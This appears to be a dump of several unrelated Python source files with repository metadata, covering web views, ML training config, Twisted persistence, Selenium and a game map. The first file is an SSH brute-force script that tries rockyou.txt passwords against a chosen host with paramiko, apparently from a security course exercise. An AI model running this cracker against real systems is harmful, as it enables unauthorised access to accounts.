] | null | null | null | ops_challenge/ops-challenge17/classes/ssh.py | jinwoov/Ops401 | 28db339e1edac31fb82640a76ebb01c4218984a0 | [
"MIT"
] | null | null | null | ops_challenge/ops-challenge17/classes/ssh.py | jinwoov/Ops401 | 28db339e1edac31fb82640a76ebb01c4218984a0 | [
"MIT"
] | null | null | null | import paramiko
from time import sleep
import os
| 32.333333 | 103 | 0.554768 | import paramiko
from time import sleep
import os
class AuthSSH():
def __init__(self):
self.IP = self.get_IP()
self.user_name = self.userInfo()
def get_IP(self):
getIP = input("What ip do you want to shell into? ")
while(getIP == "" or getIP == None):
getIP = input("Please put legit IP ")
return getIP
def userInfo(self):
getUN = input("what is the username? ")
while(getUN == "" or getUN == None):
getUN = input("Please put legit username ")
return getUN
def ssh_connection(self):
# client = paramiko.Transport((self.IP, 22))
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.crackPW(client)
def crackPW(self,client):
textFile = os.path.abspath("./rockyou.txt")
file = open(textFile, "r")
readfile = file.read().splitlines()
print(self.user_name)
for line in readfile:
print(line)
try:
client.connect(hostname=self.IP, username=self.user_name, password=str(line), port= 22)
print(f"Login was successful to {self.IP} using {str(line)}, you are now in")
break
except:
print("Login failed :(")
sleep(.5)
continue
stdin, stdout, stderr = client.exec_command("ping -c 3 8.8.8.8")
print(stdout.read().splitlines())
client.close()
return
| 1,326 | -5 | 174 |
a8f8cf8794d61748699f9b0cce01ebd6f5e5d5ae | 1,038 | py | Python | app/v1/views/users.py | codeMarble254/storo-v1 | 6386afe9fc65a9f8fef86677b27d120b24dd6244 | [
"MIT"
] | null | null | null | app/v1/views/users.py | codeMarble254/storo-v1 | 6386afe9fc65a9f8fef86677b27d120b24dd6244 | [
"MIT"
] | null | null | null | app/v1/views/users.py | codeMarble254/storo-v1 | 6386afe9fc65a9f8fef86677b27d120b24dd6244 | [
"MIT"
] | 1 | 2018-12-09T20:43:35.000Z | 2018-12-09T20:43:35.000Z | '''This module manages all user endpoints(signup, login, logout etc)'''
from flask import jsonify, make_response
from flask_restful import Resource
from werkzeug.security import generate_password_hash
from .resources import Initialize
from ..models.user import User
from ..utils.users import Validation
class Signup(Resource, Initialize):
'''Handles user registration'''
@staticmethod
def post():
'''User signup endpoint'''
data = Initialize.get_json_data()
validate = Validation(data)
validate.check_empty_keys()
validate.check_empty_values()
validate.check_number_of_fields()
validate.check_signup_credentials()
validate.check_already_exists()
password = generate_password_hash(
data["password"], method='sha256').strip()
user = User(data["username"].strip(),
data["email"].lower().strip(), password)
user.save()
return make_response(jsonify({"message": "Account created successfully"}), 201)
| 35.793103 | 87 | 0.683044 | '''This module manages all user endpoints(signup, login, logout etc)'''
from flask import jsonify, make_response
from flask_restful import Resource
from werkzeug.security import generate_password_hash
from .resources import Initialize
from ..models.user import User
from ..utils.users import Validation
class Signup(Resource, Initialize):
'''Handles user registration'''
@staticmethod
def post():
'''User signup endpoint'''
data = Initialize.get_json_data()
validate = Validation(data)
validate.check_empty_keys()
validate.check_empty_values()
validate.check_number_of_fields()
validate.check_signup_credentials()
validate.check_already_exists()
password = generate_password_hash(
data["password"], method='sha256').strip()
user = User(data["username"].strip(),
data["email"].lower().strip(), password)
user.save()
return make_response(jsonify({"message": "Account created successfully"}), 201)
| 0 | 0 | 0 |
f83dc914f243431baf9956b329f4b58d878d24e1 | 1,232 | py | Python | training.py | Laleee/poke-gan | d93506d249ac37fc971ca6504053a9d3461ebf84 | [
"MIT"
] | 2 | 2021-08-07T17:31:37.000Z | 2021-08-24T11:02:51.000Z | training.py | Laleee/poke-gan | d93506d249ac37fc971ca6504053a9d3461ebf84 | [
"MIT"
] | null | null | null | training.py | Laleee/poke-gan | d93506d249ac37fc971ca6504053a9d3461ebf84 | [
"MIT"
] | null | null | null | import torch
import wandb
from Trainer import Trainer
MAX_SUMMARY_IMAGES = 4
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
assert torch.cuda.is_available()
# LR = 2e-4
EPOCHS = 100
# BATCH_SIZE = 64
NUM_WORKERS = 4
# LAMBDA_L1 = 100
sweep_config = {
'method': 'bayes', # grid, random
'metric': {
'name': 'loss_g',
'goal': 'minimize'
},
'parameters': {
'lambda_l1': {
'values': [80, 90, 100, 110, 120, 130]
},
'batch_size': {
'values': [64]
},
'learning_rate': {
'values': [1e-5, 1e-4, 2e-4, 3e-4]
}
}
}
if __name__ == '__main__':
sweep_id = wandb.sweep(sweep_config, project="poke-gan")
wandb.agent(sweep_id, train_wrapper)
| 22.4 | 69 | 0.560877 | import torch
import wandb
from Trainer import Trainer
MAX_SUMMARY_IMAGES = 4
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
assert torch.cuda.is_available()
# LR = 2e-4
EPOCHS = 100
# BATCH_SIZE = 64
NUM_WORKERS = 4
# LAMBDA_L1 = 100
sweep_config = {
'method': 'bayes', # grid, random
'metric': {
'name': 'loss_g',
'goal': 'minimize'
},
'parameters': {
'lambda_l1': {
'values': [80, 90, 100, 110, 120, 130]
},
'batch_size': {
'values': [64]
},
'learning_rate': {
'values': [1e-5, 1e-4, 2e-4, 3e-4]
}
}
}
if __name__ == '__main__':
def train_wrapper():
wandb.init()
config = wandb.config
print(f'Config: {config}')
trainer = Trainer(
lr=config.learning_rate,
device=DEVICE,
batch_size=config.batch_size,
epochs=EPOCHS,
lambda_l1=config.learning_rate,
dataloader_num_workers=NUM_WORKERS,
max_summary_images=MAX_SUMMARY_IMAGES
)
trainer.train()
sweep_id = wandb.sweep(sweep_config, project="poke-gan")
wandb.agent(sweep_id, train_wrapper)
| 422 | 0 | 26 |
81c8c30dcc284203bcb75fe068adfc4c4550705e | 8,942 | py | Python | lib/twisted/persisted/styles.py | Kagami/kisa | 2597f67e519b8d66fec2684ff5a7726436bb029b | [
"CC0-1.0"
] | 7 | 2015-04-28T13:26:11.000Z | 2020-02-09T17:01:04.000Z | lib/twisted/persisted/styles.py | Kagami/kisa | 2597f67e519b8d66fec2684ff5a7726436bb029b | [
"CC0-1.0"
] | null | null | null | lib/twisted/persisted/styles.py | Kagami/kisa | 2597f67e519b8d66fec2684ff5a7726436bb029b | [
"CC0-1.0"
] | 3 | 2015-03-10T20:56:17.000Z | 2021-08-21T02:44:24.000Z | # -*- test-case-name: twisted.test.test_persisted -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Different styles of persisted objects.
"""
# System Imports
import types
import copy_reg
import copy
import inspect
import sys
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Twisted Imports
from twisted.python import log
from twisted.python import reflect
oldModules = {}
## First, let's register support for some stuff that really ought to
## be registerable...
def pickleMethod(method):
'support function for copy_reg to pickle method refs'
return unpickleMethod, (method.im_func.__name__,
method.im_self,
method.im_class)
def unpickleMethod(im_name,
im_self,
im_class):
'support function for copy_reg to unpickle method refs'
try:
unbound = getattr(im_class,im_name)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_class)
return bound
except AttributeError:
log.msg("Method",im_name,"not on class",im_class)
assert im_self is not None,"No recourse: no instance to guess from."
# Attempt a common fix before bailing -- if classes have
# changed around since we pickled this method, we may still be
# able to get it by looking on the instance's current class.
unbound = getattr(im_self.__class__,im_name)
log.msg("Attempting fixup with",unbound)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_self.__class__)
return bound
copy_reg.pickle(types.MethodType,
pickleMethod,
unpickleMethod)
def pickleModule(module):
'support function for copy_reg to pickle module refs'
return unpickleModule, (module.__name__,)
def unpickleModule(name):
'support function for copy_reg to unpickle module refs'
if oldModules.has_key(name):
log.msg("Module has moved: %s" % name)
name = oldModules[name]
log.msg(name)
return __import__(name,{},{},'x')
copy_reg.pickle(types.ModuleType,
pickleModule,
unpickleModule)
def pickleStringO(stringo):
'support function for copy_reg to pickle StringIO.OutputTypes'
return unpickleStringO, (stringo.getvalue(), stringo.tell())
if hasattr(StringIO, 'OutputType'):
copy_reg.pickle(StringIO.OutputType,
pickleStringO,
unpickleStringO)
if hasattr(StringIO, 'InputType'):
copy_reg.pickle(StringIO.InputType,
pickleStringI,
unpickleStringI)
class Ephemeral:
"""
This type of object is never persisted; if possible, even references to it
are eliminated.
"""
versionedsToUpgrade = {}
upgraded = {}
def requireUpgrade(obj):
"""Require that a Versioned instance be upgraded completely first.
"""
objID = id(obj)
if objID in versionedsToUpgrade and objID not in upgraded:
upgraded[objID] = 1
obj.versionUpgrade()
return obj
def _aybabtu(c):
"""
Get all of the parent classes of C{c}, not including C{c} itself, which are
strict subclasses of L{Versioned}.
The name comes from "all your base are belong to us", from the deprecated
L{twisted.python.reflect.allYourBase} function.
@param c: a class
@returns: list of classes
"""
# begin with two classes that should *not* be included in the
# final result
l = [c, Versioned]
for b in inspect.getmro(c):
if b not in l and issubclass(b, Versioned):
l.append(b)
# return all except the unwanted classes
return l[2:]
class Versioned:
"""
This type of object is persisted with versioning information.
I have a single class attribute, the int persistenceVersion. After I am
unserialized (and styles.doUpgrade() is called), self.upgradeToVersionX()
will be called for each version upgrade I must undergo.
For example, if I serialize an instance of a Foo(Versioned) at version 4
and then unserialize it when the code is at version 9, the calls::
self.upgradeToVersion5()
self.upgradeToVersion6()
self.upgradeToVersion7()
self.upgradeToVersion8()
self.upgradeToVersion9()
will be made. If any of these methods are undefined, a warning message
will be printed.
"""
persistenceVersion = 0
persistenceForgets = ()
def __getstate__(self, dict=None):
"""Get state, adding a version number to it on its way out.
"""
dct = copy.copy(dict or self.__dict__)
bases = _aybabtu(self.__class__)
bases.reverse()
bases.append(self.__class__) # don't forget me!!
for base in bases:
if base.__dict__.has_key('persistenceForgets'):
for slot in base.persistenceForgets:
if dct.has_key(slot):
del dct[slot]
if base.__dict__.has_key('persistenceVersion'):
dct['%s.persistenceVersion' % reflect.qual(base)] = base.persistenceVersion
return dct
def versionUpgrade(self):
"""(internal) Do a version upgrade.
"""
bases = _aybabtu(self.__class__)
# put the bases in order so superclasses' persistenceVersion methods
# will be called first.
bases.reverse()
bases.append(self.__class__) # don't forget me!!
# first let's look for old-skool versioned's
if self.__dict__.has_key("persistenceVersion"):
# Hacky heuristic: if more than one class subclasses Versioned,
# we'll assume that the higher version number wins for the older
# class, so we'll consider the attribute the version of the older
# class. There are obviously possibly times when this will
# eventually be an incorrect assumption, but hopefully old-school
# persistenceVersion stuff won't make it that far into multiple
# classes inheriting from Versioned.
pver = self.__dict__['persistenceVersion']
del self.__dict__['persistenceVersion']
highestVersion = 0
highestBase = None
for base in bases:
if not base.__dict__.has_key('persistenceVersion'):
continue
if base.persistenceVersion > highestVersion:
highestBase = base
highestVersion = base.persistenceVersion
if highestBase:
self.__dict__['%s.persistenceVersion' % reflect.qual(highestBase)] = pver
for base in bases:
# ugly hack, but it's what the user expects, really
if (Versioned not in base.__bases__ and
not base.__dict__.has_key('persistenceVersion')):
continue
currentVers = base.persistenceVersion
pverName = '%s.persistenceVersion' % reflect.qual(base)
persistVers = (self.__dict__.get(pverName) or 0)
if persistVers:
del self.__dict__[pverName]
assert persistVers <= currentVers, "Sorry, can't go backwards in time."
while persistVers < currentVers:
persistVers = persistVers + 1
method = base.__dict__.get('upgradeToVersion%s' % persistVers, None)
if method:
log.msg( "Upgrading %s (of %s @ %s) to version %s" % (reflect.qual(base), reflect.qual(self.__class__), id(self), persistVers) )
method(self)
else:
log.msg( 'Warning: cannot upgrade %s to version %s' % (base, persistVers) )
| 34 | 148 | 0.630508 | # -*- test-case-name: twisted.test.test_persisted -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Different styles of persisted objects.
"""
# System Imports
import types
import copy_reg
import copy
import inspect
import sys
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Twisted Imports
from twisted.python import log
from twisted.python import reflect
oldModules = {}
## First, let's register support for some stuff that really ought to
## be registerable...
def pickleMethod(method):
'support function for copy_reg to pickle method refs'
return unpickleMethod, (method.im_func.__name__,
method.im_self,
method.im_class)
def unpickleMethod(im_name,
im_self,
im_class):
'support function for copy_reg to unpickle method refs'
try:
unbound = getattr(im_class,im_name)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_class)
return bound
except AttributeError:
log.msg("Method",im_name,"not on class",im_class)
assert im_self is not None,"No recourse: no instance to guess from."
# Attempt a common fix before bailing -- if classes have
# changed around since we pickled this method, we may still be
# able to get it by looking on the instance's current class.
unbound = getattr(im_self.__class__,im_name)
log.msg("Attempting fixup with",unbound)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_self.__class__)
return bound
copy_reg.pickle(types.MethodType,
pickleMethod,
unpickleMethod)
def pickleModule(module):
'support function for copy_reg to pickle module refs'
return unpickleModule, (module.__name__,)
def unpickleModule(name):
'support function for copy_reg to unpickle module refs'
if oldModules.has_key(name):
log.msg("Module has moved: %s" % name)
name = oldModules[name]
log.msg(name)
return __import__(name,{},{},'x')
copy_reg.pickle(types.ModuleType,
pickleModule,
unpickleModule)
def pickleStringO(stringo):
'support function for copy_reg to pickle StringIO.OutputTypes'
return unpickleStringO, (stringo.getvalue(), stringo.tell())
def unpickleStringO(val, sek):
x = StringIO.StringIO()
x.write(val)
x.seek(sek)
return x
if hasattr(StringIO, 'OutputType'):
copy_reg.pickle(StringIO.OutputType,
pickleStringO,
unpickleStringO)
def pickleStringI(stringi):
return unpickleStringI, (stringi.getvalue(), stringi.tell())
def unpickleStringI(val, sek):
x = StringIO.StringIO(val)
x.seek(sek)
return x
if hasattr(StringIO, 'InputType'):
copy_reg.pickle(StringIO.InputType,
pickleStringI,
unpickleStringI)
class Ephemeral:
"""
This type of object is never persisted; if possible, even references to it
are eliminated.
"""
def __getstate__(self):
log.msg( "WARNING: serializing ephemeral %s" % self )
import gc
if '__pypy__' not in sys.builtin_module_names:
if getattr(gc, 'get_referrers', None):
for r in gc.get_referrers(self):
log.msg( " referred to by %s" % (r,))
return None
def __setstate__(self, state):
log.msg( "WARNING: unserializing ephemeral %s" % self.__class__ )
self.__class__ = Ephemeral
versionedsToUpgrade = {}
upgraded = {}
def doUpgrade():
global versionedsToUpgrade, upgraded
for versioned in versionedsToUpgrade.values():
requireUpgrade(versioned)
versionedsToUpgrade = {}
upgraded = {}
def requireUpgrade(obj):
"""Require that a Versioned instance be upgraded completely first.
"""
objID = id(obj)
if objID in versionedsToUpgrade and objID not in upgraded:
upgraded[objID] = 1
obj.versionUpgrade()
return obj
def _aybabtu(c):
"""
Get all of the parent classes of C{c}, not including C{c} itself, which are
strict subclasses of L{Versioned}.
The name comes from "all your base are belong to us", from the deprecated
L{twisted.python.reflect.allYourBase} function.
@param c: a class
@returns: list of classes
"""
# begin with two classes that should *not* be included in the
# final result
l = [c, Versioned]
for b in inspect.getmro(c):
if b not in l and issubclass(b, Versioned):
l.append(b)
# return all except the unwanted classes
return l[2:]
class Versioned:
"""
This type of object is persisted with versioning information.
I have a single class attribute, the int persistenceVersion. After I am
unserialized (and styles.doUpgrade() is called), self.upgradeToVersionX()
will be called for each version upgrade I must undergo.
For example, if I serialize an instance of a Foo(Versioned) at version 4
and then unserialize it when the code is at version 9, the calls::
self.upgradeToVersion5()
self.upgradeToVersion6()
self.upgradeToVersion7()
self.upgradeToVersion8()
self.upgradeToVersion9()
will be made. If any of these methods are undefined, a warning message
will be printed.
"""
persistenceVersion = 0
persistenceForgets = ()
def __setstate__(self, state):
versionedsToUpgrade[id(self)] = self
self.__dict__ = state
def __getstate__(self, dict=None):
"""Get state, adding a version number to it on its way out.
"""
dct = copy.copy(dict or self.__dict__)
bases = _aybabtu(self.__class__)
bases.reverse()
bases.append(self.__class__) # don't forget me!!
for base in bases:
if base.__dict__.has_key('persistenceForgets'):
for slot in base.persistenceForgets:
if dct.has_key(slot):
del dct[slot]
if base.__dict__.has_key('persistenceVersion'):
dct['%s.persistenceVersion' % reflect.qual(base)] = base.persistenceVersion
return dct
def versionUpgrade(self):
"""(internal) Do a version upgrade.
"""
bases = _aybabtu(self.__class__)
# put the bases in order so superclasses' persistenceVersion methods
# will be called first.
bases.reverse()
bases.append(self.__class__) # don't forget me!!
# first let's look for old-skool versioned's
if self.__dict__.has_key("persistenceVersion"):
# Hacky heuristic: if more than one class subclasses Versioned,
# we'll assume that the higher version number wins for the older
# class, so we'll consider the attribute the version of the older
# class. There are obviously possibly times when this will
# eventually be an incorrect assumption, but hopefully old-school
# persistenceVersion stuff won't make it that far into multiple
# classes inheriting from Versioned.
pver = self.__dict__['persistenceVersion']
del self.__dict__['persistenceVersion']
highestVersion = 0
highestBase = None
for base in bases:
if not base.__dict__.has_key('persistenceVersion'):
continue
if base.persistenceVersion > highestVersion:
highestBase = base
highestVersion = base.persistenceVersion
if highestBase:
self.__dict__['%s.persistenceVersion' % reflect.qual(highestBase)] = pver
for base in bases:
# ugly hack, but it's what the user expects, really
if (Versioned not in base.__bases__ and
not base.__dict__.has_key('persistenceVersion')):
continue
currentVers = base.persistenceVersion
pverName = '%s.persistenceVersion' % reflect.qual(base)
persistVers = (self.__dict__.get(pverName) or 0)
if persistVers:
del self.__dict__[pverName]
assert persistVers <= currentVers, "Sorry, can't go backwards in time."
while persistVers < currentVers:
persistVers = persistVers + 1
method = base.__dict__.get('upgradeToVersion%s' % persistVers, None)
if method:
log.msg( "Upgrading %s (of %s @ %s) to version %s" % (reflect.qual(base), reflect.qual(self.__class__), id(self), persistVers) )
method(self)
else:
log.msg( 'Warning: cannot upgrade %s to version %s' % (base, persistVers) )
| 908 | 0 | 173 |
ab78ba6ea21ee758e3dc2d6ed113494570f40da1 | 423 | py | Python | example_app/urls.py | dxillar/django-nepali-datetime-field | 170109103b6dcbcf3d88e518097638edd8dc92fa | [
"MIT"
] | 2 | 2021-07-27T09:31:20.000Z | 2022-01-22T04:51:11.000Z | example_app/urls.py | dxillar/django-nepali-datetime-field | 170109103b6dcbcf3d88e518097638edd8dc92fa | [
"MIT"
] | 1 | 2021-08-16T09:37:43.000Z | 2021-08-16T11:42:46.000Z | example_app/urls.py | dxillar/django-nepali-datetime-field | 170109103b6dcbcf3d88e518097638edd8dc92fa | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('example/', views.ExampleListView.as_view(), name='example_list'),
path('example/create', views.ExampleCreateView.as_view(), name='example_create'),
path('example/<int:pk>/update/', views.ExampleUpdateView.as_view(), name='example_update'),
path('example/<int:pk>/delete/', views.ExampleDeleteView.as_view(), name='example_delete'),
]
| 38.454545 | 95 | 0.723404 | from django.urls import path
from . import views
urlpatterns = [
path('example/', views.ExampleListView.as_view(), name='example_list'),
path('example/create', views.ExampleCreateView.as_view(), name='example_create'),
path('example/<int:pk>/update/', views.ExampleUpdateView.as_view(), name='example_update'),
path('example/<int:pk>/delete/', views.ExampleDeleteView.as_view(), name='example_delete'),
]
| 0 | 0 | 0 |
f9accf0185672edab98da0816005b9615b99845e | 1,147 | py | Python | ElectronicCommerce/test_case/models/driver.py | Pactortester/JingDongTestProject | b30bb987db9357f0812be64170c31b10a4cceee0 | [
"MIT"
] | null | null | null | ElectronicCommerce/test_case/models/driver.py | Pactortester/JingDongTestProject | b30bb987db9357f0812be64170c31b10a4cceee0 | [
"MIT"
] | null | null | null | ElectronicCommerce/test_case/models/driver.py | Pactortester/JingDongTestProject | b30bb987db9357f0812be64170c31b10a4cceee0 | [
"MIT"
] | 1 | 2021-09-07T02:06:01.000Z | 2021-09-07T02:06:01.000Z | from threading import Thread
from selenium.webdriver import Remote
from selenium import webdriver
# start browser
"""
if __name__ == '__main__':
host_list = {'127.0.0.1:4444': 'internet explorer', '127.0.0.1:5555': 'chrome'}
threads = []
files = range(len(host_list))
for host_name, browser_name in host_list.items():
t = Thread(target=browser, args=(host_name, browser_name))
threads.append(t)
for i in files:
threads[i].start()
for i in files:
threads[i].join()
"""
if __name__ == '__main__':
driver = browser()
driver.get("http://www.baidu.com")
driver.quit()
| 27.97561 | 97 | 0.62075 | from threading import Thread
from selenium.webdriver import Remote
from selenium import webdriver
# start browser
def browser():
# browser (chrome, firefox, ie ...)
driver = webdriver.Chrome()
# driver = webdriver.Ie()
# driver = webdriver.Firefox()
# dc = {'platform': 'ANY', 'browserName': 'chrome', 'version': '', 'javascriptEnabled': True}
# dc = {'browserName': dc_browser}
# host = '127.0.0.1:4444' # host: port (default: 127.0.0.1:4444)
# dc = {'browserName': 'chrome'}
# driver = Remote(command_executor='http://' + host + '/wd/hub', desired_capabilities=dc)
return driver
"""
if __name__ == '__main__':
host_list = {'127.0.0.1:4444': 'internet explorer', '127.0.0.1:5555': 'chrome'}
threads = []
files = range(len(host_list))
for host_name, browser_name in host_list.items():
t = Thread(target=browser, args=(host_name, browser_name))
threads.append(t)
for i in files:
threads[i].start()
for i in files:
threads[i].join()
"""
if __name__ == '__main__':
driver = browser()
driver.get("http://www.baidu.com")
driver.quit()
| 487 | 0 | 22 |
e0274a74ce7936e51ee707d9e4845ace56c95ffb | 940 | py | Python | lagom/metric/returns.py | zuoxingdong/lagom | 3b6710804dbc79c6dffb369ac87c68f4055ab6cd | [
"MIT"
] | 383 | 2018-07-11T17:43:10.000Z | 2022-01-24T08:46:23.000Z | lagom/metric/returns.py | LorinChen/lagom | 273bb7f5babb1f250f6dba0b5f62c6614f301719 | [
"MIT"
] | 90 | 2018-07-11T23:51:45.000Z | 2021-12-16T08:56:42.000Z | lagom/metric/returns.py | LorinChen/lagom | 273bb7f5babb1f250f6dba0b5f62c6614f301719 | [
"MIT"
] | 32 | 2018-07-12T18:21:03.000Z | 2021-09-15T05:47:48.000Z | import numpy as np
from lagom.transform import geometric_cumsum
from lagom.utils import numpify
def bootstrapped_returns(gamma, rewards, last_V, reach_terminal):
r"""Return (discounted) accumulated returns with bootstrapping for a
batch of episodic transitions.
Formally, suppose we have all rewards :math:`(r_1, \dots, r_T)`, it computes
.. math::
Q_t = r_t + \gamma r_{t+1} + \dots + \gamma^{T - t} r_T + \gamma^{T - t + 1} V(s_{T+1})
.. note::
The state values for terminal states are masked out as zero !
"""
last_V = numpify(last_V, np.float32).item()
if reach_terminal:
out = geometric_cumsum(gamma, np.append(rewards, 0.0))
else:
out = geometric_cumsum(gamma, np.append(rewards, last_V))
return out[0, :-1].astype(np.float32)
| 29.375 | 95 | 0.647872 | import numpy as np
from lagom.transform import geometric_cumsum
from lagom.utils import numpify
def returns(gamma, rewards):
return geometric_cumsum(gamma, rewards)[0, :].astype(np.float32)
def bootstrapped_returns(gamma, rewards, last_V, reach_terminal):
r"""Return (discounted) accumulated returns with bootstrapping for a
batch of episodic transitions.
Formally, suppose we have all rewards :math:`(r_1, \dots, r_T)`, it computes
.. math::
Q_t = r_t + \gamma r_{t+1} + \dots + \gamma^{T - t} r_T + \gamma^{T - t + 1} V(s_{T+1})
.. note::
The state values for terminal states are masked out as zero !
"""
last_V = numpify(last_V, np.float32).item()
if reach_terminal:
out = geometric_cumsum(gamma, np.append(rewards, 0.0))
else:
out = geometric_cumsum(gamma, np.append(rewards, last_V))
return out[0, :-1].astype(np.float32)
| 76 | 0 | 23 |
7bb94c472fc1b0918cc565d949b96695ed473f73 | 689 | py | Python | generate_console_data.py | MarioPossamato/MariOver | 088adc0c0c9350b5a426093d2efbfce7edf28b24 | [
"MIT"
] | 14 | 2022-03-06T22:25:44.000Z | 2022-03-22T19:49:20.000Z | generate_console_data.py | MarioPossamato/MariOver | 088adc0c0c9350b5a426093d2efbfce7edf28b24 | [
"MIT"
] | 1 | 2022-03-15T06:28:05.000Z | 2022-03-17T09:33:12.000Z | generate_console_data.py | MarioPossamato/MariOver | 088adc0c0c9350b5a426093d2efbfce7edf28b24 | [
"MIT"
] | 1 | 2022-03-09T09:35:21.000Z | 2022-03-09T09:35:21.000Z | from nintendo.dauth import LATEST_VERSION
username = None
password = None
with open("ConsoleData/8000000000000010", mode="rb") as file:
data = file.read()
username_bytes = bytearray(data[0x00064020:0x00064028])
username_bytes.reverse()
username = "0x" + username_bytes.hex().upper()
password = data[0x00064028:0x00064050].decode("ascii")
with open("webserver_args.json", mode="w") as file:
args = """{
"system_version": %d,
"user_id": "%s",
"password": "%s",
"keys": "./ConsoleData/prod.keys",
"prodinfo": "./ConsoleData/PRODINFO.dec",
"ticket": "./ConsoleData/SUPER MARIO MAKER 2 v0 (01009B90006DC000) (BASE).tik"
}""" % (LATEST_VERSION, username, password)
file.write(args) | 34.45 | 79 | 0.711176 | from nintendo.dauth import LATEST_VERSION
username = None
password = None
with open("ConsoleData/8000000000000010", mode="rb") as file:
data = file.read()
username_bytes = bytearray(data[0x00064020:0x00064028])
username_bytes.reverse()
username = "0x" + username_bytes.hex().upper()
password = data[0x00064028:0x00064050].decode("ascii")
with open("webserver_args.json", mode="w") as file:
args = """{
"system_version": %d,
"user_id": "%s",
"password": "%s",
"keys": "./ConsoleData/prod.keys",
"prodinfo": "./ConsoleData/PRODINFO.dec",
"ticket": "./ConsoleData/SUPER MARIO MAKER 2 v0 (01009B90006DC000) (BASE).tik"
}""" % (LATEST_VERSION, username, password)
file.write(args) | 0 | 0 | 0 |
61734459fe44e90b6292840ec0c69472f8b973e6 | 11,811 | py | Python | ALTANTIS/world/world.py | finnbar/ALTANTIS | 8754fcec1845b9b2dcce478554f25d2a50f873b4 | [
"MIT"
] | null | null | null | ALTANTIS/world/world.py | finnbar/ALTANTIS | 8754fcec1845b9b2dcce478554f25d2a50f873b4 | [
"MIT"
] | null | null | null | ALTANTIS/world/world.py | finnbar/ALTANTIS | 8754fcec1845b9b2dcce478554f25d2a50f873b4 | [
"MIT"
] | 1 | 2020-08-30T16:21:10.000Z | 2020-08-30T16:21:10.000Z | """
Deals with the world map, which submarines explore.
"""
import string
from functools import reduce
from ALTANTIS.utils.text import list_to_and_separated
from ALTANTIS.utils.direction import reverse_dir, directions
from ALTANTIS.utils.consts import X_LIMIT, Y_LIMIT
from ALTANTIS.world.validators import InValidator, NopValidator, TypeValidator, BothValidator, LenValidator, RangeValidator
from ALTANTIS.world.consts import ATTRIBUTES, WEATHER, WALL_STYLES
import random
from typing import List, Optional, Tuple, Any, Dict, Collection
undersea_map = [[Cell() for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
def map_to_dict() -> Dict[str, Any]:
"""
Converts our map to dict form. Since each of our map entries can be
trivially converted into dicts, we just convert them individually.
We also append a class identifier so they can be recreated correctly.
"""
undersea_map_dicts : List[List[Dict[str, Any]]] = [[{} for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
for i in range(X_LIMIT):
for j in range(Y_LIMIT):
undersea_map_dicts[i][j] = undersea_map[i][j]._to_dict()
return {"map": undersea_map_dicts, "x_limit": X_LIMIT, "y_limit": Y_LIMIT}
def map_from_dict(dictionary: Dict[str, Any]):
"""
Takes a triple generated by map_to_dict and overwrites our map with it.
"""
global X_LIMIT, Y_LIMIT, undersea_map
X_LIMIT = dictionary["x_limit"]
Y_LIMIT = dictionary["y_limit"]
map_dicts = dictionary["map"]
undersea_map_new = [[Cell._from_dict(map_dicts[x][y]) for y in range(Y_LIMIT)] for x in range(X_LIMIT)]
undersea_map = undersea_map_new
| 39.634228 | 207 | 0.605283 | """
Deals with the world map, which submarines explore.
"""
import string
from functools import reduce
from ALTANTIS.utils.text import list_to_and_separated
from ALTANTIS.utils.direction import reverse_dir, directions
from ALTANTIS.utils.consts import X_LIMIT, Y_LIMIT
from ALTANTIS.world.validators import InValidator, NopValidator, TypeValidator, BothValidator, LenValidator, RangeValidator
from ALTANTIS.world.consts import ATTRIBUTES, WEATHER, WALL_STYLES
import random
from typing import List, Optional, Tuple, Any, Dict, Collection
class Cell():
# A dictionary of validators to apply to the attributes
VALIDATORS = {
"weather": InValidator(WEATHER.keys()),
"docking": BothValidator(LenValidator(0, 255), TypeValidator(str)),
"wallstyle": InValidator(WALL_STYLES),
"hiddenness": BothValidator(TypeValidator(int), RangeValidator(0, 10))
}
def __init__(self):
# The items this square contains.
self.treasure = []
# Fundamentally describes how the square acts. These are described
# throughout the class. A cell with no attributes acts like Empty from
# the previous version - has no extra difficulty etc.
self.attributes = {}
# The list of subs for whom the hiddenness attribute no longer affects the rendering of the map
self.explored = set([])
@classmethod
def _from_dict(cls, serialisation):
p = cls()
p.treasure = list(serialisation['treasure'])
p.attributes = dict(serialisation['attributes'])
if "explored" in serialisation:
p.explored = set(serialisation["explored"])
return p
def _to_dict(self):
return {
"treasure": list(self.treasure),
"attributes": dict(self.attributes),
"explored": list(self.explored)
}
def cell_tick(self):
if "deposit" in self.attributes and random.random() < 0.015:
self.treasure.append("plating")
if "diverse" in self.attributes and random.random() < 0.015:
self.treasure.append("specimen")
if "ruins" in self.attributes and random.random() < 0.015:
self.treasure.append(random.choice(["tool", "circuitry"]))
if random.random() < 0.01:
self.explored.clear()
def treasure_string(self) -> str:
return list_to_and_separated(list(map(lambda t: t.title(), self.treasure)))
def square_status(self) -> str:
return f"This square has treasures {self.treasure_string()} and attributes {self.attributes}."
def pick_up(self, power: int) -> List[str]:
power = min(power, len(self.treasure))
treasures = []
for _ in range(power):
treas = random.choice(self.treasure)
self.treasure.remove(treas)
treasures.append(treas)
return treasures
def bury_treasure(self, treasure: str) -> bool:
self.treasure.append(treasure)
return True
def unbury_treasure(self, treasure: str) -> bool:
if treasure in self.treasure:
index = self.treasure.index(treasure)
del self.treasure[index]
return True
return False
def name(self, to_show: Collection[str] = ("d", "a", "m", "e", "j")) -> Optional[str]:
if "name" in self.attributes:
name = string.capwords(self.attributes["name"], " ")
if name != "":
return name
to_check = {"d": "docking", "a": "ruins", "m": "deposit", "e": "diverse", "j": "junk"}
for attr in to_check:
if attr in to_show and to_check[attr] in self.attributes:
name = self.attributes[to_check[attr]].title()
if name != "":
return name
return None
